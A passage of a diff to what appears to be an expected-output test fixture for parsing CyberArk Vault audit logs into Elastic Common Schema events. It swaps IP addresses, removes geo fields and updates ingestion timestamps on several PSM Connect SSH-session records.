09:38:20\",\"IsoTimestamp\":\"2021-03-11T17:38:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -224,20 +215,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -261,7 +243,7 @@ }, "@timestamp": "2021-03-11T17:46:56.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -273,15 +255,15 @@ ], "ip": [ "127.0.0.1", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:46:56Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "message": "PSM Connect",
 "issuer": "Administrator",
 "extra_details": {
@@ -294,20 +276,20 @@
 "psmid": "PSMServer",
 "session_id": "ba22b012-8291-11eb-b981-080027efd402",
 "src_host": "127.0.0.1",
- "dst_host": "34.123.103.115"
+ "dst_host": "67.43.156.15"
 },
 "rfc5424": true,
 "ca_properties": {
 "other": {},
 "device_type": "Operating System",
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "policy_id": "UnixSSHKeys",
 "user_name": "adrian"
 },
- "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
+ "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian",
 "safe": "PSM",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "PSM Connect",
 "timestamp": "Mar 11 09:46:56",
 "desc": "PSM Connect"
@@ -318,8 +300,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936269200Z", - "original": "\u003c5\u003e1 2021-03-11T17:46:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:56\",\"IsoTimestamp\":\"2021-03-11T17:46:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331144600Z", + "original": "\u003c5\u003e1 2021-03-11T17:46:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:46:56\",\"IsoTimestamp\":\"2021-03-11T17:46:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", "action": "psm connect", @@ -342,20 +324,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "adrian" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -379,7 +352,7 @@ }, "@timestamp": "2021-03-11T17:48:34.000Z", "file": { - "path": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian" + "path": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian" }, "ecs": { "version": "1.12.0" 
@@ -391,15 +364,15 @@ ], "ip": [ "10.0.2.2", - "34.123.103.115", - "81.32.170.205" + "67.43.156.15", + "67.43.156.13" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-11T17:48:34Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e300\u003c/MessageID\u003e\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"adrian\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n 
\u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "message": "PSM Connect",
 "issuer": "Administrator",
 "extra_details": {
@@ -412,20 +385,20 @@
 "psmid": "PSMServer",
 "session_id": "f6acbf00-8291-11eb-b9ba-080027efd402",
 "src_host": "10.0.2.2",
- "dst_host": "34.123.103.115"
+ "dst_host": "67.43.156.15"
 },
 "rfc5424": true,
 "ca_properties": {
 "other": {},
 "device_type": "Operating System",
- "address": "34.123.103.115",
+ "address": "67.43.156.15",
 "creation_method": "PVWA",
 "policy_id": "UnixSSHKeys",
 "user_name": "adrian"
 },
- "file": "Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian",
+ "file": "Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian",
 "safe": "PSM",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "PSM Connect",
 "timestamp": "Mar 11 09:48:34",
 "desc": "PSM Connect"
@@ -436,8 +409,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:30.936272100Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:34\",\"IsoTimestamp\":\"2021-03-11T17:48:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:47.331150400Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n 
\u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 